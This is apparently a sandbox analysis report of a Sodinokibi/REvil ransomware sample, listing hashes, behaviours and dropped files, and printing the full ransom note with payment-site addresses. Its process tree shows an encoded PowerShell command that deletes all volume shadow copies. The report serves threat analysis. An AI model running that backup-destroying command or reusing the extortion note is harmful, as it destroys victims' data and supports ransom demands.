Analysis

  • max time kernel
    137s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    04-05-2024 17:54

General

  • Target

    13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe

  • Size

    164KB

  • MD5

    13d4c1451da6fa284c08c669a7d0e7c1

  • SHA1

    2ea65287c7489d8ab5abd04e172c55d1518a4052

  • SHA256

    df724c49a1401d66f690b0a940f70bd286671448a625690ccdfdc4c42b4b5b07

  • SHA512

    f845335dd84b5bf9b20889dfd051bf012dfcf96adaf4f6de171b3a8e62f42cf03c0e18314ad6ca59ff3eb5e1c0ef3dce179845aac6582b9438c0b13809f47554

  • SSDEEP

    3072:ffYWjswg4fQlt4ndm8jX5IXzs+M9VQHDO9KR/vOst3b:ffYWAw9fcUdmwIXo+M9VQHDxmst

Score
10/10

Malware Config

Extracted

Path

C:\Recovery\9xfuulq-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 9xfuulq. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. If you have any questions, or experiencing troubles with the test decryption, you can use our chat on the website, our stuff support will help you as quick as possible. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F0A11F0CC03D1866 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/F0A11F0CC03D1866 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: eUXKmgaSo16xFEgjZwQCmPz/F25xLfJgpQUqGi8vk8tRRU1abX+4YwD88NQBnZqN xt1i9oZ2sRRoLlR3qaDydhoSmdsvSDhxqC0Ges5lkrMRBzOihlMzliKGQSWVD0uU YmPQH7Tk/+AnQOsOL3r1w2IxJvxQjC38sOUxO6E2JOHU7q/NsEv0tYkxvKzEfdri PT9HmlIrYTGLRY26ucQ14exq44L+BXbHybdusRMMp+Vhf9hRfRSklrt1rNaVJrqd v9/ozpJSMnOB7z1Uh5svKNEUr7iIKwh/P4eGc/Hg+Z8G0jQmY/fwtDTW0LvC+TaP QLhH0UEYNwoVj087cqDAQv1ivBg7Ao6aVtC8pFDpsXir9KttiE0TL6sXVqjT39Y6 PI4zUfSC6dQOLPouNQs9rLImiWBU2x7EYwo1bNFTq3PVjIIiPKw/I5lqwOXsqRWh BICSdxJ/6QClZ3RwI5lmdSF0GjJ4eisl6gP0kqWKMzXp/NvOigTOQ6DqefZQba3R LW6M6928gT6rTds7VnO2vqFjOJ2ZbnvX7rrl1orVWwZoQJZD1vhVgkUFebZQsC+6 77JSQdEmH73wKY0oieqkn/m4Odggb821gtxTSWq+mTN13jxC3tGnUMFk/QttQeby YnOs2tUs1JiRegZBZ2zwFscuH23o9dGxCaTz4rsIT5IfL2tlIrvf/rKg1FOkVY5k H8UvRV4X3F3RwFMWGwNL8KJTBxb0gFsljHBjSnk7dg0JIc6Y6/BctTrFEzTM76ZB p/CDNinJjA21egU+wHi/QR3UiU+AglPqxRhBxTfZzfEyWVpbrkiVX5s9pgBsrEwy 2cFnOK1pHFcVe6JXkQ3aGHqenKNQXJ1xirxwubSVwK/1G0ylmc14IISOJZFVWS2X vi0EtCYZPmJd/lMExUnQtUrj44bu7YHoSXyT9YfKUf+a2bYVzEWoe6oe9n3R6M2P 2oJ2gIhZ2tQsd5tVwShUQnVlvysVMSEpZUJfMdZac6A/hkH48vvjVIkSlNZamxnQ V/rY85DFZ1kMceSIMIVst7y5PerIoBV4mFtreW0Jj/PVuhOdoBpGYxz1Tn3oIYKY pLRWSRaqqv1sCBTa1ypia5SsTC72tmZ2Mp2bn2cDciv5uJxcpoIHFEB3xo6sprPD 88Vta018WNYXVF5t4O2djLc9K4WnbBgMAfvvHQ/BwBVzqM0144hzLpy8JCF6CX/4 Ew7KTS7vgPYVt1uc Extension name: 9xfuulq ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F0A11F0CC03D1866

http://decryptor.top/F0A11F0CC03D1866

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 20 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe"
    1⤵
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2936
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3020
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2968
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2736

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Recovery\9xfuulq-readme.txt

      Filesize

      7KB

      MD5

      36f6ba89862209dc0d8567cbb64e8719

      SHA1

      0ecfb9131b15bfe0ce3c85ad24f71c80b6d628ef

      SHA256

      dff88f9dc854ef2624fac009533bcaa6f4e15b2a1f4285b4fd2d0cc48665103e

      SHA512

      8cbcdd22a32fc08bcbac9d76834e1d90dcebbb3e20667a51a4bba3e0ca4dc8026f3ef347e8c33ca013a59582d84bdf85d72f66258d1d7c8fcd12cb67af5ceba8

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      98e9533ce9466386ae97669272fa92d6

      SHA1

      681388fac3189b660da15f7956c2edfe24f9e070

      SHA256

      f6ca33ec558f82dfa3510b8708bb23c044a173007ca04866f1efe0cbf030742b

      SHA512

      87568ba564b17c355e1dd0b7ad466786d16041d07609be349b68295765474aee3f6fc565f4b49dc093aba9ed58f41464f809d387717be73a1eefc8c31e522269

    • C:\Users\Admin\AppData\Local\Temp\Tar437D.tmp

      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

    • C:\Windows\System32\catroot2\dberr.txt

      Filesize

      193KB

      MD5

      cb962fcebf48e120fdb9d3d7d67ce92e

      SHA1

      8037c1f034b637addc9e84908cc53e5f385ca5df

      SHA256

      11577d21f91ade88f3c97bd3da7027d804462fdf959f7980316dda79b72a5887

      SHA512

      9074321644e2b82f6f61648b8885475c9f707ee9db7474e8b07d8f00448e69bf476fddf801ec5d249705e8487ddb27d14ac09239f1ac150151fcfaa4c51b350e

    • memory/3020-5-0x000000001B750000-0x000000001BA32000-memory.dmp

      Filesize

      2.9MB

    • memory/3020-11-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

      Filesize

      9.6MB

    • memory/3020-12-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

      Filesize

      9.6MB

    • memory/3020-9-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

      Filesize

      9.6MB

    • memory/3020-10-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

      Filesize

      9.6MB

    • memory/3020-8-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

      Filesize

      9.6MB

    • memory/3020-4-0x000007FEF57BE000-0x000007FEF57BF000-memory.dmp

      Filesize

      4KB

    • memory/3020-6-0x0000000001F00000-0x0000000001F08000-memory.dmp

      Filesize

      32KB

    • memory/3020-7-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

      Filesize

      9.6MB